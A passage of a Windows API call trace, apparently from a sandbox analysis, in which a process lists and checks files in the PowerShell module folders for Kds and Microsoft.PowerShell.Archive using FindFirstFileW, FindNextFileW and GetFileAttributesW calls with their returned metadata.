lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1e30 [0227.911] FindNextFileW (in: hFindFile=0x25b73cd1e30, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.911] FindNextFileW (in: hFindFile=0x25b73cd1e30, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.911] FindNextFileW (in: hFindFile=0x25b73cd1e30, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 1 [0227.911] FindNextFileW (in: hFindFile=0x25b73cd1e30, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds.psd1", cAlternateFileName="")) returned 0 [0227.911] FindClose (in: hFindFile=0x25b73cd1e30 | out: hFindFile=0x25b73cd1e30) returned 1 [0227.912] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1")) returned 0x20 [0227.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0227.912] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd16b0 [0227.912] FindNextFileW (in: hFindFile=0x25b73cd16b0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.912] FindNextFileW (in: hFindFile=0x25b73cd16b0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.912] FindNextFileW (in: hFindFile=0x25b73cd16b0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0227.913] FindNextFileW (in: hFindFile=0x25b73cd16b0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0227.913] FindNextFileW (in: hFindFile=0x25b73cd16b0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 0 [0227.913] FindClose (in: hFindFile=0x25b73cd16b0 | out: hFindFile=0x25b73cd16b0) returned 1 [0227.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0227.913] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1350 [0227.913] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.914] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.914] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0227.914] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0227.914] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.914] FindClose (in: hFindFile=0x25b73cd1350 | out: hFindFile=0x25b73cd1350) returned 1 [0227.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x653ef8cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0227.914] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\*"), lpFindFileData=0x653ef8cf60 | out: lpFindFileData=0x653ef8cf60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1a70 [0227.926] FindNextFileW (in: hFindFile=0x25b73cd1a70, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.926] FindNextFileW (in: hFindFile=0x25b73cd1a70, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0227.926] FindNextFileW (in: hFindFile=0x25b73cd1a70, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 0 [0227.926] FindClose (in: hFindFile=0x25b73cd1a70 | out: hFindFile=0x25b73cd1a70) returned 1 [0227.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x653ef8cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0227.929] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\*"), lpFindFileData=0x653ef8cf60 | out: lpFindFileData=0x653ef8cf60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1110 [0227.929] FindNextFileW (in: hFindFile=0x25b73cd1110, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.930] FindNextFileW (in: hFindFile=0x25b73cd1110, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0227.930] FindNextFileW (in: hFindFile=0x25b73cd1110, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.930] FindClose (in: hFindFile=0x25b73cd1110 | out: hFindFile=0x25b73cd1110) returned 1 [0227.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x653ef8ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0227.930] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d340 | out: lpFileInformation=0x653ef8d340*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0227.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x653ef8cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0227.930] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\*"), lpFindFileData=0x653ef8cfc0 | out: lpFindFileData=0x653ef8cfc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1dd0 [0227.931] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.931] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0227.931] FindNextFileW (in: hFindFile=0x25b73cd1dd0, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 0 [0227.931] FindClose (in: hFindFile=0x25b73cd1dd0 | out: hFindFile=0x25b73cd1dd0) returned 1 [0227.931] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.psd1")) returned 0xffffffff [0227.931] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.psm1")) returned 0xffffffff [0227.931] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.cdxml")) returned 0xffffffff [0227.931] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.xaml")) returned 0xffffffff [0227.932] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.dll")) returned 0xffffffff [0227.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x653ef8cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0227.932] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d4d0 | out: lpFileInformation=0x653ef8d4d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0227.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x653ef8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0227.932] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1ef0 [0227.932] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.932] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.932] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0227.932] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d110 